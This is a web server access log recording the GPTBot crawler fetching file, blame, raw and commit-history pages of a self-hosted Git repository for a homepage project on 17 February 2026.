"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 74.7.227.38] [Length 11262] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" -[17/Feb/2026:13:06:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" -[17/Feb/2026:13:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" -[17/Feb/2026:13:06:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" -[17/Feb/2026:13:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" -[17/Feb/2026:13:06:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 74.7.227.38] [Length 10777] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" -[17/Feb/2026:13:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 74.7.227.38] [Length 11207] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" -[17/Feb/2026:13:06:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" -[17/Feb/2026:13:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" -[17/Feb/2026:13:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" -[17/Feb/2026:13:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" -[17/Feb/2026:13:06:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" -[17/Feb/2026:13:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 74.7.227.38] [Length 10824] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" -[17/Feb/2026:13:06:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 74.7.227.38] [Length 10349] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" -[17/Feb/2026:13:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 74.7.227.38] [Length 11183] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" -[17/Feb/2026:13:06:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" -[17/Feb/2026:13:06:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" -[17/Feb/2026:13:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 74.7.227.38] [Length 10728] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" -[17/Feb/2026:13:06:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" -[17/Feb/2026:13:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" -[17/Feb/2026:13:06:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" -[17/Feb/2026:13:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 74.7.227.38] [Length 11667] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" -[17/Feb/2026:13:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" -[17/Feb/2026:13:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" -[17/Feb/2026:13:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" [Client 74.7.227.38] [Length 10354] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" -[17/Feb/2026:13:06:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 74.7.227.38] [Length 48879] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:13:06:34 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:06:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 74.7.227.38] [Length 10316] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:13:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 74.7.227.38] [Length 11021] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 74.7.227.38] [Length 11265] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 74.7.227.38] [Length 11851] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" -[17/Feb/2026:13:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 74.7.227.38] [Length 10951] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" -[17/Feb/2026:13:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" -[17/Feb/2026:13:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js" [Client 74.7.227.38] [Length 9975] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" -[17/Feb/2026:13:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" [Client 74.7.227.38] [Length 10939] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" -[17/Feb/2026:13:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 24063] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" -[17/Feb/2026:13:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 74.7.227.38] [Length 10325] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" -[17/Feb/2026:13:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/status.json" -[17/Feb/2026:13:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" -[17/Feb/2026:13:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json" -[17/Feb/2026:13:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10863] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 17249] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" -[17/Feb/2026:13:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 24056] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" -[17/Feb/2026:13:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js" [Client 74.7.227.38] [Length 10100] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js" -[17/Feb/2026:13:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" [Client 74.7.227.38] [Length 14676] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 28906] [Gzip 10.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/i18n.js" -[17/Feb/2026:13:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/nginx.conf" [Client 74.7.227.38] [Length 11913] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:13:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 74.7.227.38] [Length 11190] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" -[17/Feb/2026:13:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 74.7.227.38] [Length 10353] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" -[17/Feb/2026:13:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" [Client 74.7.227.38] [Length 17999] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:13:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/status.json" -[17/Feb/2026:13:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" -[17/Feb/2026:13:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 74.7.227.38] [Length 11033] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 